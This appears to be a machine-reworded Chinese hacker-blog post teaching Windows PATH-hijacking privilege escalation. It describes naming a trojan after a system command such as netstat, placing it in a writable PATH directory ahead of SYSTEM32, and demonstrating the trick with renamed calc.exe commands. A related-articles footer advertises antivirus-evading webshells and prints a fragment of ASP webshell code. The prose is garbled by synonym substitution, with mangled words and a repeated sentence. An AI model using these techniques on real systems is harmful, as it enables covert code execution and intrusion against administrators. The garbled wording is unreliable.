运用环境变量提权的小窍门

hacker5年前黑客文章736

今日给大伙儿产生一篇运用环境变量提权的小窍门,我将它称作鬼手,相近三仙归洞中魔术师中的技巧,由于管理人员有可能不经意间中帮鞋大家进行提权全过程。

 

环境变量一般就是指在电脑操作系统中用于特定电脑操作系统软件环境的一些主要参数,例如临时文件夹部位和系统软件文件夹名称部位这些。这一点有点儿类似DOS阶段的默认设置相对路径,如果你运作一些程时序除开在当今文件夹名称中找寻外,还会继续到设定的默认设置相对路径中去搜索。例如环境变量中的“Path”便是一个自变量,里边储存了一些常用命令所储放的文件目录相对路径。

 

查询系统软件当今的环境变量,能够应用SET指令查询。查询系统软件当今的环境变量,能够应用SET指令查询

 

我们要的便是SET指令里的PATH环境变量。

大家还可以立即打PATH,看下有哪些?path

留意看图中,PATH回显中,里面的 C:/PERL 排到最前面,乃至排到了 C:/WINDOWS/SYSTEM32 前。

我们知道,WINDOWS下你运行命令时,它会依据当前目录、PATH自变量的次序去找这一文件夹名称的,寻找后再依据文件后缀名COMBATEXE的后缀名次序去实行的。

 

你拥有构思了沒有?

假定 C:PERL 文件目录可写,你能将你的木马病毒起名叫WIN下现有的文件夹名称放到PERL文件目录下边。如同你的木马病毒起名叫netstat.bat,放到C:PERL文件目录下边,当管理员运行NETSTAT.EXE想查询该机数据连接状况时,你的木马病毒早已抢前运作了。做 *** 黑客关键的一条是构思要灵便,知识层面还要广,想先人未想。

 

下面就是我用计算方式程序流程做的一个实例,系统命令基础以下:

C:\>set

C:\>path

C:\>dir c:\perl

C:\>c:\perl\calc.exe

C:\>cd perl

C:\perl>ren calc.exe netstat.exe

C:\perl>cd \

C:\perl>cls

C:\>netstat
标签: 黑客技术

相关文章

Keepassx是不是适用全部电脑操作系统?

Keepassx是不是适用全部电脑操作系统?

什么叫Keepassx? 针对安全性的本人数据库管理,KeepassX是一个十分高规定的客户的专用工具。KeePassX出示了一个用以建立安全性登陆密码的实用程序,密码生成器是高宽比可订制的,迅速的...

DirBuster是什么?

DirBuster是什么?

DirBuster是什么? DirBuster的关键目地是找寻掩藏的文件目录和Web服务端网页页面。房地产商有时候会离去贴近但未连接的网页页面;这一专用工具来发觉这种潜在性的系统漏洞。这是一个jav...

什么是电脑肉鸡_电脑肉鸡是什么意思

所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix等;更可以是一家公司\企业\学校甚至是政府军队的服务器,一般所说的肉鸡是一台...

御剑后台管理扫描仪珍藏版

御剑后台管理扫描仪珍藏版

御剑后台管理扫描仪珍藏版是T00LS大神的著作,便捷搜索客户后台管理详细地址,另外也为软件开发工作人员提升了难度系数,尽可能与众不同的后台管理文件目录构造。 附加很强劲的词典,词典大家也是能够自身改...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Ntop? Ntop是互联网检测专用工具,由网络信息安全技术专业工作人员用于显示信息互联网应用状况。当放置“互动方式”时,ntop将在终端用户的终端设备上显示信息网络状态。假如置放在“Web方...

各种过安全狗一句话木马asp,php,aspx一句话

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> < %eval (eval(chr(114)+chr(...